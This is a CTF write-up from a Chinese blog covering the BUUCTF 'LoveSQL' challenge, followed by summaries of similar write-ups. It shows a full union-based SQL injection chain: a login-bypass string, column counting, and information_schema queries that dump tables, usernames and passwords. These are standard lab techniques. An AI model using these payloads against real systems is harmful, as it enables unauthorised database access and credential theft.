[极客大挑战 2019]LoveSQL

最新推荐文章于 2022-10-22 08:55:06 发布
最新推荐文章于 2022-10-22 08:55:06 发布
阅读量828 收藏 1
点赞数 1
分类专栏: 每日一题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44033675/article/details/121505455
版权

CTF SQL注入

文章目录

环境

BUUCTF在线环境,启动靶机,获取链接。
http://4c0c8173-cd8d-4da6-b36f-1136831030bf.node4.buuoj.cn:81/

解题思路

访问链接,发现跟之前做的EasySQL一样的页面,上次是万能密码直接进入了获取了flag,先试试万能密码。
在这里插入图片描述
使用万能密码admin' or '1'='1
在这里插入图片描述
获得了一串字符串,拿去MD5解密没有解出来。
在这里插入图片描述
接着思考,题目提示是SQl注入,而万能密码能登进来说明是存在字符型注入的,所以看看用户表有多少字段。
admin' order by 3%23注意注释符#在URL中需要url编码即%23.
在这里插入图片描述
回显正常,试试4个字段。
admin' order by 4%23,报错,说明当前表只有三个字段。
在这里插入图片描述
继续构造,查看在哪一个字段有回想。
1' union select 1,2,3%23,结果说明第2,3字段都可以回显,所以我们payload的位置可以在2,3字段。
在这里插入图片描述
爆当前数据库名和数据库版本。
1' union select 1,database(),version()%23
在这里插入图片描述
当前数据库名为geek,继续按照流程爆表名。
1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23
有两个表:geekuser,l0ve1ysq1。
在这里插入图片描述
接着爆l0ve1ysq1表的字段名。
1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="l0ve1ysq1"%23
在这里插入图片描述
有三个字段和我们之前用order by语句判断的一致,接着爆出表内容。
1' union select 111,222,group_concat(id,username,password) from l0ve1ysq1%23
在这里插入图片描述
获取flag。
最终payload为:

?username=' union select 111,222,group_concat(id,username,password) from l0ve1ysq1%23&password=a260e681b279a958e882a9f3403357a8

总结

这道题是基础字符型SQL注入,没有什么坑点。

1ance.
关注
专栏目录
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 560
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 331
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
[极客挑战 2019]LoveSQL 1
qq_43618536的博客
07-01 885
BUUCTF的[极客挑战 2019]LoveSQL 1
[极客挑战 2019]LoveSQL1
qq_51902218的博客
08-09 270
1. 判断是什么类型的注入 1' 发现报错 原因:select name.passwd from users where username=' 1' ' and password=‘ ’; 有语法错误 所以可以判断为字符型注入 2. 利用order by 语句判断字段数 1' order by 3# 1' order by 4 # 得到字段数为3 3.显位:联合查询查看显示位 1' union select 1,2...
CTF_SQL】[极客挑战 2019]LoveSQL 1
十二_的博客
10-22 1684
的WP来学习他们的思路,多刷题,以形成自己的思路,常刷,常总是不可避免的,尽管菜鸟小编并做不到。一般的套路使用之后,我们要先熟悉这个数据库相关SQL注入的基本语法或公式,才能进一步破解;这里,我们就需要对常用的一些编码格式有一定的了解。本道题,我们要观察它是什么编码?一开始,对于菜鸟级别的我们来说,一般是不了解的。再来回想一下,我们刚才出现的编码是什么?编码,参加过全国大学生数学建模大赛的或者知道。进入环境,我们就尝试去最经典的万能密码。不信,咱们最好还是测试一下吧,有点像。所以,sql注入是可以的~~~
BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1207
前言 很好,考完了死亡高数和大物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
极客挑战 2019]LoveSQL 1
最新发布
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
buu [极客挑战 2019]LoveSQL 1
weixin_45642610的博客
01-10 1948
buu [极客挑战 2019]LoveSQL 1 -刷题个人日记 小白一个,写给自己看。 进去后是这样: 用户名输入1和1'测试 发现1'报错 有sql语法错误,说明有sql注入点且后台数据库是MariaDB 用户名输入sql注入基本公式:1' or 1=1;# 结果: 3bba40d66c98e28cf3bac11b45edbbab像是md5编码,试试解码后不行。 可能flag在其他表里,我们要知道有哪些表且表的属性有哪些。 慢慢来,payload: check.php?username=admin'
[极客挑战 2019]LoveSQL 1(SQL注入
小谢的博客
06-12 5007
[极客挑战 2019]LoveSQL 1(SQL注入
buu_WEB [极客挑战 2019]LoveSQL1
weixin_53146913的博客
04-05 233
由于一直学sql,但是一直记不住这个最最最基本注入的过程,所以专门写一篇记录一下。 一、万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 二、 查询字段数: 在url中输入:注意:此时是在url中输入的,所以不能用#,而用其url编码%23。 /check.php?username=admin' order by 3%23&password=1 存在 /check.php?username=admin' order by 4%
Buuctf:[极客挑战 2019]LoveSQL1
羽的博客
07-09 282
随便输入 1 1 果然。 1' 1
CTF---BUUCTF之[极客挑战 2019]LoveSQL 1
weixin_44632787的博客
06-17 1542
CTF练习题里的BUUCTF之[极客挑战 2019]LoveSQL 1 启动我们的挑战项目,这题一看就知道是SQL注入了。。。而且跟上一次做的好像,不知道这一次的难不难。 先来随便输入个“万能钥匙”吧!1’ or 1=1 # 嗯哼?这个是MD5加密吗? 上网找一下MD5在线加解密的网站:https://www.cmd5.com/。 看看能不能得到我们想要的答案 果然没解出来,照理说CTF的题不会这么简单。这个可能是一个陷阱,或者是另外一种解法(反正我不会…)。所以,我们试试正常的解题思路吧!先用
BUUCTF WEB [极客挑战 2019]LoveSQL1
guishengyx的博客
10-18 194
首先查看源码,没什么发现 继续尝试万能密码 成功登录 MD5解密无果 看起来不是 因为题目提示SQL,所以试一下注入 使用他给的密码登录admin 在url中使用order by,查询到有3个字段 直接使用union select 1,2,3 发现回显没有改变,将password的值改为1,显错注入 ?username=admin&password=1'union select 1,table_name,3 from information_schema...
BUUCTF [极客挑战 2019]LoveSQL 1
CrotZZ的博客
07-07 1623
#和- - 表示注释,url中的#号是用来指导浏览器动作的,对服务器端无用。所以http请求中不包括#,因此使用#无法表示注入,- -(空格)在传输过程中空格会被忽略,导致无法注释 可以使用–+的方式+会被解释成空格,也可以–%20或者#可以写成%23 首先是用万能密码尝试 有成功的返回,试着看看有多少字段 ?username=1’ order by 4%23&password=123有错误返回 获取回显点位 ?username=1’ union select 1,2,3%23&passw
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值